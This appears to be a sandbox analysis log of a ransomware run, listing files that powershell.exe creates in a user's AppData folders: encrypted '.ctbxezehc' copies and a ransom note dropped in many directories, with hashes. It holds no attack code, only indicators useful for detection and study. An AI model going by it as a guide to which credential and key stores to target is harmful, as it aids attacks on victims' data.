C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Proof\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs.ctbxezehc
binary
MD5: c3ded52e9e85a16d123160524785af02
SHA256: 365834e5db5624ad13acbe2a901957c4c037c0f986d292aafc6f1f86c64bdb2d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST.ctbxezehc
binary
MD5: 6a1a6b4eadd590d80f9db795f9fcc607
SHA256: 2dd6a067db77829ad314ae768f0c4a6da47eb1dfae1512f83d2b9867aff13681
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\PowerPoint\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml.ctbxezehc
binary
MD5: fbddd50ac1ad37546835d05647c5a99d
SHA256: eed7061945d13f1344660faee381e0c3406ec562429952b791848624b3d42219
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs.ctbxezehc
binary
MD5: 3b66a9b7ff902d836ad8261d1ac17307
SHA256: a881f39ef7a37d59f744b2d485d97bb6c891d698121b5357fc68dc16a7a1cdfa
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml.ctbxezehc
binary
MD5: 834027b4ef608ab956522c5ff08df3eb
SHA256: 683410c5a50ea5f8dea0c092b633548dbfeb1645cf5bb23af5b33e288f9828ab
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml.ctbxezehc
binary
MD5: b797f3eb9396f4f50b64a04e7108a7cb
SHA256: 693b2ea8f75a3e96cd594980bf42b6cfbe353fc35e235bfa876a11020bd7d083
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat.ctbxezehc
binary
MD5: 501de841f10e5a74644585c527c7dd80
SHA256: 999e8a1c6f5bcff6cba0b46ed29b09be0cbb544291008ae60838e06e113e0741
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl.ctbxezehc
binary
MD5: b5df041a7293f20e4ad761e22d821e3f
SHA256: 4e7aa85243296b5f502980faa3a9152c4092c83ec162a43709a54803bf041c0a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd.ctbxezehc
binary
MD5: 700bd4cebcb3e01c98dc96d1cc0862e6
SHA256: 8aa0c7e1413cf919474d9fcf76e65a64a394efc94c95adefabb8214381449d81
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.ctbxezehc
binary
MD5: 9e8fa299f4ab9eebdd0d32201ecdf076
SHA256: c526983015181812a3a2266471fee57609b8988e94bb49ded33877c2ff1d2097
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat.ctbxezehc
binary
MD5: 8ed4cd0e9fb766e66ad0b411823d16cc
SHA256: e0a4280e698c02fa28be203693f761c3d50a5cf8149c5b6b0cb87462d40659a4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\XLSTART\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: bbe553b52bf1e1413b145440af23945b
SHA256: 43b2c799d66ad1fb8fec8d4bb22ef056d1cca86d08610e280073352bcd2c626d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: 6e69afdd553f8e0bfb2e8ff17e8eebfb
SHA256: 6b212013ce0657339cf86c6d33c74b4dbe4b6f71025886b67abeb8fbf46917d8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: b6c5c951e5da98a7931564af4c00e7be
SHA256: 95592f20a499fbb87e6f923e3950037be326976df0e653881457353dd378617c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: fa12b61a196a436d21e80764bb1de948
SHA256: 2e0c73b8d0337ffb7fdc9449352ac85e9c746267e9c93a95d6062a2dc5317a23
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: 32f8e6a74b6c67796a5df644ff5777e8
SHA256: ccd2d7c77e344dd9748a0e0f4e182335ebb892755f948265dfb82830ec33325b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f.ctbxezehc
binary
MD5: f7e4d012ddf1744a84ea1034b453c6f7
SHA256: 6a289cf0cfb64f1a679b4a84fcf0ffabaa8e657c67652cf2af07637440828177
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\AddIns\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Credentials\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3.ctbxezehc
binary
MD5: 586fc9f6b0692d9a5728438a3d44421a
SHA256: a1a964cff6cc341c324e3a8eee87f636c8559bf3aa9e6ca27967f04da1538255
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Media Center Programs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Identities\{E4CE17A7-FC47-4CD1-8FF6-45436C8F45DB}\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml.ctbxezehc
binary
MD5: 2dbfbe483134f02b83ea1a9078ba7c73
SHA256: 0dbc7164288256d2445053e72fea33715c12d73a0557e549d8f2e7291807f9b0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml.ctbxezehc
binary
MD5: b606792f8f4e8d2feb9b80b610c75354
SHA256: 9ce0ef8f3264ec3c4988e2d170e7015e2bd9b63398a9ff1da14b9f9021d28f1b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.ctbxezehc
binary
MD5: 53a4b02583d0f595d47fba3541002375
SHA256: b3aef61a119dc2eabeedf76b2251c6b10452eb4a72f533eacb0c841d9d74f3fc
3596
powershell.exe
C:\Users\admin\AppData\Roaming\FileZilla\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.ctbxezehc
binary
MD5: 12312872ad5c23dc589ed6e449087040
SHA256: 4d8f137f5638a59b57abc7c3212ff957b8de3f7661a489f597e230763a912572
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy.ctbxezehc
binary
MD5: c018638a696f57c441e130eef0f942ea
SHA256: d1eb4e1520958526d7c7bf6e1fb440e7de2de5c04dbf11da85a9eda99399c9fe
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log.ctbxezehc
binary
MD5: ce6f71f899a3a425f2e7ee92d442ce83
SHA256: 5f411116a99304fd0888e8c11ff404b994a8c109cc7b390d873b5c4025da8da8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\NativeCache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log.ctbxezehc
binary
MD5: f8562b164ba4c63e80695fc7feecd4ac
SHA256: 9ef653093dc5d4a14f815e7d1d036b765662ed3eed4a76998a5fb822d6af3df4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Headlights\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Linguistics\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\J7D4H966\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.ctbxezehc
binary
MD5: c4b7f3f7396d16a4ea5ad8a3d438ef16
SHA256: 7c4274b54b1fb5c8236c38ccbcaaf8bdd2b5b249bcd6e39bed346dbc4e375bae
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.ctbxezehc
binary
MD5: ff084fe84573f8f0fbf6bab17035e32d
SHA256: 9ae7b084ec1921813942f0d3ca8d49ed387ceda018f8870cf951047f461f5a56
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.ctbxezehc
binary
MD5: 5a984fbe8e2d85d672d5989b345effb9
SHA256: 55d143a628575d705fddd11ada9a9cdbb6349eeb677f7e77c5067ccaa6ad4eb2
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.ctbxezehc
binary
MD5: 1cc12335d5df7d5511afacc491e752e8
SHA256: b14fd90773a1de801a9818381d276d1a3f7587bc5eafa5cd0804aa2d386547c4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.ctbxezehc
binary
MD5: 729496f4080e84213ba119901d665549
SHA256: 111bb4397e1971c3456421ff57b434593199bf9d35ddc75e84e12a2af0dc3527
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Collab\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Forms\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\CTBXEZEHC-DECRYPT.txt
text
